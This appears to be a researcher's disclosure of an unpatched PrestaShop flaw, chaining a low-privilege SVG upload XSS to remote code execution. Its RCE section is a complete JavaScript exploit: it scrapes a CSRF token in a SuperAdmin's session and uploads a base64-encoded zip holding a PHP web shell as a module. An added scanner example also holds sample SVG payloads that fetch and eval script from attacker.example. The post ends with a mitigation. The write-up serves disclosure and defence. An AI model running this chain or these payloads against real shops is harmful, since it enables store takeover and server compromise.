Hi guys, I'm here to disclose a vulnerability I found in PrestaShop. They said it is hard to patch, so they didn't patch it. The flaw is just a low-privilege authenticated XSS, but since PrestaShop allows SuperAdmins to load modules and themes, it's possible to get RCE if we target this type of user.
Why am I posting this?
It's more a case study. I am currently studying for the AWAE, and one of the topics I see a lot on the internet is XSS to RCE, so I decided to give it a try on some CMSs.
I tried to contact the PrestaShop team, and they said they accept this kind of "security issue"; they also said it is the same as allowing SuperAdmins to upload .php files and get RCE, so they don't plan to fix it. I tried to argue, but they really don't believe this is a security issue.
Again, I'm not here to blame anyone; I really understand their side. I'm just demonstrating the "failure" and how you can disable the function that causes it if you don't use it.
The XSS
The XSS is pretty easy to spot and to exploit. We will use a user with the Salesman profile, who has the privilege to create products and reply to orders (a Salesman alone can't get RCE: he has no privilege to upload .php files, i.e. modules or themes).
This is my team on PrestaShop:
Step by step to get an XSS
1 - Go to the Products tab under Catalog
2 - Select any product and open insert/edit images
3 - In the image source dialog you have the ability to upload SVG files
4 - Files uploaded here are reachable under /img/cms
5 - Upload your best SVG XSS payload and open it at http://prestashop.local/img/cms/XSS.svg; because it is served from the shop's own origin, the script inside it runs with the session of whoever opens it
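As an added example (not part of the original write-up and not PrestaShop's code), here is a small Node.js scanner that shows why accepting SVG as an "image" is an XSS sink: SVG is XML that the browser renders as a document, so it can carry script elements, event-handler attributes and javascript: links exactly like an HTML page. The SVG samples are constructed for this example and the attacker.example host is hypothetical; the rules are a coarse regex heuristic to illustrate what an upload gate must reject, a production filter should parse the XML instead.

```javascript
// Added example: flag the active-content constructs that make an uploaded
// SVG an XSS carrier. Regex-based on purpose so it runs with no dependencies;
// a real upload filter should use an XML parser (or reject SVG outright).

const ACTIVE_CONTENT_RULES = [
  { name: "script element",            re: /<\s*script\b/i },
  { name: "event handler attribute",   re: /\son[a-z]+\s*=/i },
  { name: "javascript: URL",           re: /(href|xlink:href|src)\s*=\s*["']?\s*javascript:/i },
  { name: "foreignObject (HTML inside SVG)", re: /<\s*foreignObject\b/i },
  { name: "external entity / DTD",     re: /<!(DOCTYPE|ENTITY)\b/i },
  { name: "set/animate on href",       re: /<\s*(set|animate)\b[^>]*attributeName\s*=\s*["']?(xlink:)?href/i },
];

// Returns the names of every rule that matched, in rule order; an empty
// array means none of the known active-content constructs were found.
function findActiveContent(svgText) {
  return ACTIVE_CONTENT_RULES.filter(r => r.re.test(svgText)).map(r => r.name);
}

// Upload gate: only plain markup passes.
function isSafeSvgUpload(svgText) {
  return findActiveContent(svgText).length === 0;
}

// Constructed sample 1: the kind of payload a low-privilege user would upload.
// It pulls an attacker-hosted script (hypothetical host), which is where the
// admin-side logic such as a module upload would live.
const maliciousSvg = `<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="1" height="1">
  <script xlink:href="http://attacker.example/exploit.js"></script>
  <rect width="1" height="1" onload="fetch('http://attacker.example/exploit.js').then(r=>r.text()).then(eval)"/>
</svg>`;

// Constructed sample 2: a javascript: link, no script element at all.
const hrefSvg = `<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
  <a xlink:href="javascript:alert(document.domain)"><text y="10">click</text></a>
</svg>`;

// Constructed sample 3: a benign logo.
const benignSvg = `<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 10 10">
  <circle cx="5" cy="5" r="4" fill="#c00"/>
</svg>`;

console.log("malicious:", findActiveContent(maliciousSvg));
console.log("href only:", findActiveContent(hrefSvg));
console.log("benign:   ", findActiveContent(benignSvg));
```

The event-handler rule is the one most people forget: an SVG with no script element but an onload attribute on any shape fires just the same when the file is opened directly, which is why an allowlist on the extension alone (as in the file manager config discussed further down) is the cleaner fix.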
How to get RCE
Here is JavaScript code that, when it runs in a SuperAdmin's browser (for example from the uploaded SVG), uploads a shell to http://your.prestashop.local/modules/shell/shell.php. Because the SVG is served from the shop's own origin, the XHR calls below carry the SuperAdmin's session cookie: the first request scrapes a CSRF _token from the module manager page, the second posts a zip to the module import endpoint.
const admin_url = "http://localhost/prestashop/admin386mdqdn3/"; // Modify only this line
var token1;
const content_type = "application/x-zip-compressed";
// Base64 of a zip archive containing shell/shell.php; it is uploaded as a "module".
// Declared with var, not const, because the string is built up with += below.
var shellb64 = "UEsDBAoAAAAAACyRzlIAAAAAAAAAAAAAAAAGAAAAc2hlbGwvUEsDBBQ";
shellb64 += "AAAAIAEuTzlJAl6iYVQAAAGsAAAAPAAAAc2hlbGwvc2hlbGwucGhws7EvyCjg5dLX0uLlUtB";
shellb64 += "SABMOiaUlGflFCkCQbFJmUmSQBxIGYX1eLl6uzDSNzOLi1BINlXh315Bo9eTcFPVYTU1ermq";
shellb64 += "gEiAoriwuSc1FlbXm5aoFAFBLAQIfAAoAAAAAACyRzlIAAAAAAAAAAAAAAAAGACQAAAAAAAA";
shellb64 += "AEAAAAAAAAABzaGVsbC8KACAAAAAAAAEAGACfgM+NYWHXAZ+Az41hYdcBL4QHi2Fh1wFQSwE";
shellb64 += "CHwAUAAAACABLk85SQJeomFUAAABrAAAADwAkAAAAAAAAACAAAAAkAAAAc2hlbGwvc2hlbGw";
shellb64 += "ucGhwCgAgAAAAAAABABgAMtw67GNh1wEy3DrsY2HXAZjcpxxhYdcBUEsFBgAAAAACAAIAuQA";
shellb64 += "AAKYAAAAAAA==";
const blob = base64toBlob(shellb64, content_type);
/* Kudos to Nolan from www.dubget.com for this function */
function base64toBlob(base64Data, contentType) {
    contentType = contentType || '';
    var sliceSize = 1024;
    var byteCharacters = atob(base64Data);
    var bytesLength = byteCharacters.length;
    var slicesCount = Math.ceil(bytesLength / sliceSize);
    var byteArrays = new Array(slicesCount);
    for (var sliceIndex = 0; sliceIndex < slicesCount; ++sliceIndex) {
        var begin = sliceIndex * sliceSize;
        var end = Math.min(begin + sliceSize, bytesLength);
        var bytes = new Array(end - begin);
        for (var offset = begin, i = 0; offset < end; ++i, ++offset) {
            bytes[i] = byteCharacters[offset].charCodeAt(0);
        }
        byteArrays[sliceIndex] = new Uint8Array(bytes);
    }
    return new Blob(byteArrays, { type: contentType });
}
// Step 1: the module manager page is fetched with the SuperAdmin's session and the
// CSRF _token is scraped from its HTML. Step 2 runs only once the token is in hand.
function reqListener() {
    var res1 = this.responseText;
    token1 = res1.match(/_token=[a-zA-Z0-9\-]*/);
    if (!token1) {
        console.log("no _token found in the module manager page");
        return;
    }
    console.log(token1[0]);
    uploadModule();
}
// Step 2: POST the zip to the module import endpoint using that token.
function uploadModule() {
    var formData = new FormData();
    formData.append('file_uploaded', blob, 'shell.zip');
    var oReq3 = new XMLHttpRequest();
    oReq3.open("post", admin_url + "index.php/improve/modules/import?" + token1[0], true);
    oReq3.send(formData);
}
var oReq = new XMLHttpRequest();
oReq.onload = reqListener;
oReq.open("get", admin_url + "index.php/improve/modules/manage", true);
oReq.send();

Videos
Some PoCs showing how we (as a Salesman user) can upload a malicious SVG file that, when opened by a SuperAdmin, triggers interesting behaviour
Priv esc PoC:
RCE PoC:
How to disable SVG uploads
If you believe you don't need SVG files to be uploaded through this function on your server, here is how to disable it:
1 - Open the file prestashop/[Admin]/filemanager/config/config.php
2 - On line 106, remove 'svg' from the $ext_img array
If you then try to upload any SVG file, the application will deny it.
Optionally, also remove the SVG MIME type from the $mime_img array on line 117.
Emails I sent to the PrestaShop team
It's a dup lol
After writing this article (before posting), I contacted PrestaShop again and asked for permission to post it; they said someone had already written an article about it, so this is the original:
https://stazot.com/prestashop-csrf-to-rce-article/
Awesome work from @sivaneshashok